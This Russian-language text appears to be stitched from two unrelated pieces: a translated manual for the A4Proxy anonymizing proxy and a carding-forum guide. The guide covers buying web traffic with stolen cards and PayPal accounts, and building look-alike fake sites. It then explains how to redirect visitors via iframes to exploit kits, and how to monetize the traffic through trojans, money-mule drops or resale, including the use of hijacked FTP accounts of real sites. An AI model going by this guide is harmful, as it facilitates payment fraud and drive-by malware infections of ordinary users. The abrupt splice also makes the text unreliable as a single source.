Browser Port – Порт для входящих HTTP запросов с вашего броузера (и сетевых компьютеров, использующих A4Proxy для соединения с интернет). Вы можете использовать числа от 1024 до 65535 или 80 (рекомендуется оставить по умолчанию) Но если другая программа использует этот же порт, вам следует поменять его и в A4Proxy и в вашем броузере.
Check Port – Порт используемый для проверки прокси-сервера на анонимность. Вы можете использовать, то же число что и броузер, или другой.
Закладка Browser Options
Во время посещения веб-сайтов, загружая файлы, ваш браузер посылает им, так называемые HTTP request (запросы), информируя о том какая страничка вам нужна, в каждом таком запросе содержится различная информация, необходимая для соединения браузера и веб-сайт: Тип вашей операционной системы (Windows 95/98/Me/2000/XP, и т.д.) и тип используемого браузера, эти данные могут быть использованы для обнаружения “дыр”
Accept-Language (Язык/Кодировка) Эта информация может быть использована для ограничения доступа к ресурсам или для др. целей.
The Referrer information- позволяет выявить ваши интересы, т.е. откуда вы пришли
Cookies- Могут содержать огромное количество информации, как ннапример e-mail, адрес, пароли… Вся эта информация находится в заголовках HTTP запросов. При использовании A4Proxy, который “стоит” между вашим браузером и сайтом, становится возможным изменять или удалять эти данные, для этого надо выбрать функцию “HTTP request modifications” и ввести описание в список изменений, если вы только хотите блокировать “Cooke” то выберите функцию “Block Cookies”. Обе эти фукции доступны из меню в трее. Modification list – Содержит список данных HTTP, которые вы хотите изменить или удалить.
Variable field- Имена тех переменных, которые вы хотите удалить или изменить (без двоеточия, они будут добавлены автоматически)
Replace with… field- Введите здесь новые данные или оставьте поле пустым, если вы хотите удалить эти данные из запросов- конпка “Revove” “Set as defoult”-Нажмите что-бы ипользовать данные по умолчанию, такие как: Accept-Language:en (английский) – язык вашего браузера, Идентификация вас как; User-Agent:Mozilla/4.0 – скрывет тип и версию используемого броузера. Очень просто вносить изменения, используя список исходящих запросов: Список исходящих запросов содержит последние HTTP запросы, разделенные пустыми линиями. Самые последние помещены вверх. Этот список очень удобный, он позволяет немедленно увидеть, какие данные в настоящий момент присутствуют в запросе, и легко удалить или поменять их. Когда вы выберите данные в списке исходящих запросов поля: “Variable” и “Replace with…” автоматически заполняются, затем вы можете изменить содержание и добавить в список исходящих. Некоторые наиболее часто встречающиеся данные: GET, POST, CONNECT – эти данные не отноятся к переменным HTTP, это названия методов запроса, т.о. не изменяйте это поле. Двоеточие разделяет переменную.
“Accept:” – Показывает типы файлов которые могут быть приняты. Информирует удаленный компьютер о типе информации к которой вы получаете доступ.
“Accept-Language:” – Информирует удаленный компьютер о языке, используемом вашим броузером.
“Accept-Encoding:” – Информирует удаленный компьютер кодировке, принимаемой вашим броузером.
“If-Modified-Since:” – Загружвет файл, если только он был изменен с [дата/время]
“User-Agent:” – Содержит информацию о вашей ОС и типе броузера. “Host:” – Запрошенный хост. Не удаляйте и не изменяйте этот параметр, запрос пропадет
“Proxy-Connection:” – Тип соединения. В большинстве случаев не надо удалять, т.к. эти данные изменяются прокси сервером.
“Pragma:”- Метод использования прокси сервером кэша. В большинсте случаев присутствие этих данных говорит о подключении через прокси сервер.
Закладка Security & Redirection Rules
CLIENT-PROXY Server Associations – Список клиентов в сети, proxy-серверов сопоставленных с ними. Если IP-адрес клиента(машины сделавшей запрос) находится в этом списке, то HTTP запрос перенаправляется proxy-серверу присвоенному этому IP. Этот режим позволяет например, использовать особый proxy-сервер для каждого компьютера в локальной сети. Чтобы сопоставить машину с определенным прокси сервером выберите клиента(компьютер в LAN-Local area network т.е. локальная сеть) из списка активных proxy-серверов и нажмите “add” (добавить)
HOST-PROXY Server Associations – Список удаленных компьютеров и прокси-серверов сопоставленных с ними. Если запрсивший хост содержится в списке, то запрос перенаправляется соответствующему proxy- серверу. Этот режим позволяет например, использовать особый proxy-сервер для определенного хоста. Для то что бы сопоставить хост и proxy-сервер, выберите хост из списка хостов, которые были запрошены (Закладка Proxy Activity : Requested Hosts) и прокси сервер из списка proxy-серверов (Proxy Check tab), нажмите “add”
Client Stop List- Все запросы с этих IP-адресов блокируются.
HOST Stop List- Все запросы сделанные к этим IP-адресам блокируются программой A4Proxy. Полезно для блокировки баннеров
CLIENT Allowed List- Этот параметр полезен для администраторов, которые открывают доступ в интернет всем иашинам в локальной сети, используя A4Proxy. Все адреса которых нет в этом списке блокируются
Notify in Browser Response- Когда эта функция включена , машины присутствующие “CLIENT Stop List” получают соответствующее предупреждение в их браузерах, когда пытаются получить доступ в интернет. Аналогичное уведомление получает пользователь, удаленного хоста, при попытке получить доступ к ресурсам машины, находящейся в этом списке.
Enable Stop and Associations Lists- Включите эту функцию, что бы активировать вышеперечисленные настройки.
Если программа A4Proxy не работает
Возможные причины:
-Все Proxies повреждены (нерабочие)
-Неправилная настройка
Если вы проверили все прокси сервера в базе данных, и все из них показаны с Красным Крестом ,то что может быть неправильно:
1. Firewall на вашей машине(компьютере), блокирует входящий трафик к A4Proxy – это функционирует, как будто этот прокси посылает запросы к себе через proxies, чтобы проверить их надежно. Если firewall блокирует входящий трафик на порт 80 (или порт на который настроена программа в разделе Proxy Options-Listen port 8080 или 3128 – но 80 предпочтительней), проверка не будет работать.
2. Ваша машина(компьютер) не имеет публичный IP адрес, который является видимым в Интернете: Пожалуйста запустите Тест Совместимости(Compatibility Test) в меню Помощи(Help).
3. Присутствие программного обеспечения, которое использует порт 80 (или порт который установлен в A4Proxy для прослушивания).Пожалуйста запустите Тест Совместимости(Compatibility Test) в меню Помощи (Help).
4. Ваш поставщик Интернета блокирует доступ общественным прокси серверам. Введите в строку адрес и номер порта одного из прокси серверов непосредственно в вашем browser вместо 127.0.0.1, и см., можете ли Вы соединяться с любым вэбсервером в этой конфигурации. Повторите это с различным proxies. Если Вы можете соединиться с websites, ваш поставщик не блокирует proxies.
5. Ваш поставщик может блокировать входящий трафик на некоторых портах (своего рода firewall, используемый поставщиком).
6. Возможно включена функция Direct Conneckion, дотупная в меню “Options” и в tray menu
Вы не можете соедениться с любым сайтом.
Если, после ввода в настройках браузера 127.0.0.1 порта 80 Вы не можете подсоедениться к любому сайту, возможная причина, что порт 80 используется другой программой(приложением). Пожалуйста запустите Тест Совместимости(Compatibility Test) в меню Помощи(Help).
Фактически, это – адрес вашей собственной машины(компьтера). Ваш browser теперь посылает запросы о страницах и файлах не к website непосредственно, а к A4Proxy, который, в свою очередь, переадресовывает все эти запросы анонимным прокси серверам. Связь между A4Proxy и вашим browser требует, чтобы они оба использовали один и тот же порт: в этом случае, 80. Однако, если порт уже занят
в соответствии с другой программой, это предотвратит связь между browser и A4Proxy, и Вы не будете способны подключиться к любому websites. Удостовертесь, что ваша машина(компьютер) не управляет другим местным(локальным) прокси сервером, или Web сервером (MS Front Page Personal Web Server extension), или WinGate и т.д. – любое программное обеспечение, которое использует порт 80, предотвратит ваш browser от “наблюдения” A4Proxy.
Виды трафа
COST METRIC: CPV (Cost Per Visit) | FORMAT: Pop-unders | ориентировочная цена: $0.004 Per Visitor
Это самый выгодный вид трафа для нас, почему? потому что его как правило много, и у него маленькая стоимость за 1 уника. Для танкистов поясню,
pop-unders – это всплывающие окна (попап), заходя на какой нибудь ресурс, у бедного/богатого уника всплывает попап, в котором стоит твой ифрейм или редирект, результат – подгружается сплоит. Часто уник не замечает попапа, пока они не закрывают главное окно браузера, т.к. попапы появляются в новом окне, которое минимизировано. Скорость отгрузки cpv трафа значительно выше всех остальных. В результате за малые деньги с высокой скоростью мы получаем много уников.
COST METRIC: CPC, PPC (Cost/Pay Per Click) | FORMAT: Text Ads | ориентировочная цена: $0.10 Per Click
Это SЕ (search engine) траф. Деньги снимаются с депозита кампании по ~10 центов за 1 клик из поисковика/фида. Плохая сторона этого трафа в том, что он дорогой. Получается ~100 $ за 1к трафа.. (нужно иметь многобабловые картонки и/или палки.)
COST METRIC: CPC (Cost Per Click) | FORMAT: Graphical Banners | ориентировочная цена: $0.10 Per Click
Никогда не занимался этим трафам, т.к. трафа там нет нифига. Ну есть наверна, но весьма мало, и учитывая тот факт что сплоит или кардинг
быстро попалят, много трафа там ненадоешь..
COST METRIC: CPM (Cost Per 1000 Impressions) | FORMAT: Graphical / Rich media banners | ориентировочная цена: $0.50 Per thousand
Impressions
Тоже банеры, но цена идет ориентировочно по 50центов за 1000 показов банера. Ситуация ровно такая же как и с CPC. много внимания уделять ей не стоит.
Косательно последних двух позиций, можно конечно найти контору в которую можно подгружать свои флешовые банеры, писать правильный акшнскрипт
который включится тогда когда вам нужно, и тогда будет шоколад. Но я так еще не пробовал, это только теория.
Targeted traffic
Данный вид трафа хорошо кардится, плохо льется. Чаще всего встречается на конторах типа “10.000 visitors за 10.99$” и оплаичвается палкой. В основном льется генеренка (за редким исключением).
На селлерской конторе делается акк, вбивается ссылка куда будет лится траф, выбирает тематика трафа (например шопинг или политика), и по данной тематике на вашу ссылку льется траф.
Хочется также сказать, что в сети встречаются довольно разные цены на траф. Из опыта, могу с уверенность сказать что чем дешевле цена за траф – тем больше траф разбавлен ботами. Так что не скупись!
2. Кейворды
Покупая траф, (SE) вам придется вбивать кейворды по которым данный траф будет лится. На многих конторах на каждый кейворд устанавливается
своя минимальная и максимальная цена. Так как нам нужно чтоб трафа было много, соответственно кейворды должны быть качественные.
Где взять кейворды?
Вы можете погуглить и посмотреть кейворды на сайтах которые на первых позициях по вашей тематике, а можете воспользоватся сервисами -
wordtracker.com, overture.com и тд. (часто встречается что прям у конторы есть подборка кеев). Мы расмотрим wordtracker.
“Покупаем” там акк на неделю, и подыскиваем кейворды по заданной тематике. Там можно сразу смотреть качество нужных вам кеев.
Вот скрин:
user posted image
3. Конторы
Ясен перец злачные места палить не буду, но для новичков подскажу где можно взять немного трафа, и заработать пару десятков долларов за сутку.
- hitpulse.com – Заходите, регаетесь, создаете кампанию, делаете вбив с палки и траф сразу начинает лится. Апрува там ждать не нужно (у всех бы так ) Трафа там очень и очень мало, максимум по 60-100 в час. (Вбив нужно делать амерской ночью, т.к. админы быстро одупляются и суспендят акк).
- miva.com Продает cpc траф. Кол-во трафа зависит от ваших кейвордов. Как правило нужно покупать телефонный номер, делать с него прозвон, и ждать входящего от них звонка. Но у меня бывало что кампании активировались и без прозвона. Трафа не очень много, на пиво и сигареты хватит. Акки живут иногда долго. Также можно покупать акки с логов , они более живучие.
- webhitsdirect.com. Кампании активируется часто без прозвона. Сливается за сутку 100-150к ГЕНЕРЕНКИ .. т.е. пробив у этого трафа меньше 2%
- kanoodle.com – за ночь сливается 10-30к сpc трафа. Прозвон обязателен. Приятный саппорт, очень наивный.
Больше контор палить не буду, гуглите сами. Для особых танкистов могу подсказать несколько кеев по которым следует гуглить:
Online Marketing Service, Advertising, buy traffic, buy popup, zoo porn, buy pop-unders, buy a lot of traffic, .. и т.д. и т.п…
4. Фейки
Что делаем мы, мы покупаем домен максимально схожий с именем оригинала.. например на playgames.com мы покупаем play-games.com или playgames.org
Далее копируем сайт. (не имея “правильного скрипта”, который обрабатывал бы формы и пр.. желательно делать фейки максимально простых сайтов)
На фейке изменяем контактные данные на данные из картонки, а также меняем номер телефона.
На этот сайт мы ставим свой счетчик. Кардим на фейк траф, и дрочим на статистику счетчика, ожидая траф (иногда процесс апрува идет 2-3дня).
Как только траф появляется, ставим ифрейм или редирект. Сплоит лучше подгружать в нерабочее амерское время, потому что амеры на работе не засиживаются, ровно в шесть или семь по ихнему времени они разбегаются по домам. Ночные смены встречаются крайне редко.
Также можно использовать ftp акки сайтов (везде полно продаётся), после того как траф пойдёт ставить ифрейм или редирект, желательно смотреть чтоб pr сайта был не 0 , а хотяб 3.
Хочу добавить, что траф лучше всго покупать, продавать через тдски – TDS Kallisto (бесплатная), Сутра(платная, цена соответствует качеству).
5. Вбив (сокс, картон, прозвон)
Тут говорить впринципе особо неочем.. Ставим сокс, вбиваем картон или палку, прозваниваем селлера. Иногда могут понадобится сканы. Где брать сканы? – заказывать у художников ).
6. Заработок на трафе.
Скардить-то мы скардили траф , только вот что с ним теперь делать , это зависит от количества трафа и его особеностей.
Итак первым рассмотрим CPC траф , он дорогой и качественный и его мало , посему бабло будем косить с качества а не с количества )
Вариант номер 1 – договариваемся с владельцем дроп проектта и сливаем ему тематический джоб траф , в данном случае выхлоп будет зависеть исключительно от того как договоритесь , из расчёта что с 100 уников в среднем будет получатся 2-4 дропа из них 1-2 будут реально рабочими.
Вариант номер 2 – ищем партнёрку по продаже чего-либо , будь то софт , таблетки , одежда итд итп , льём туда тематический траф , имеем почти честно заработаные процнты с продаж.
Вариант номер 3 – на троя , траф по тематике конкретного банка или конторы аки которой мы хотим пробить. Этот метод не очень эфективный.
Остальные виды трафа кроме как на сплоит в приципе никуда не годятся , так что выбор тут очевиден , либо грузим своего троя либо сливаем комуто за $ , главное в этом деле знать реальное качество трафа и лить в 1 руки и не пытатся наебать покупателя , соблюдая эти правила успех и куча оптовых скупщиков трафа вам гарантирована , попробуйте предложить траф сервисам загрузок.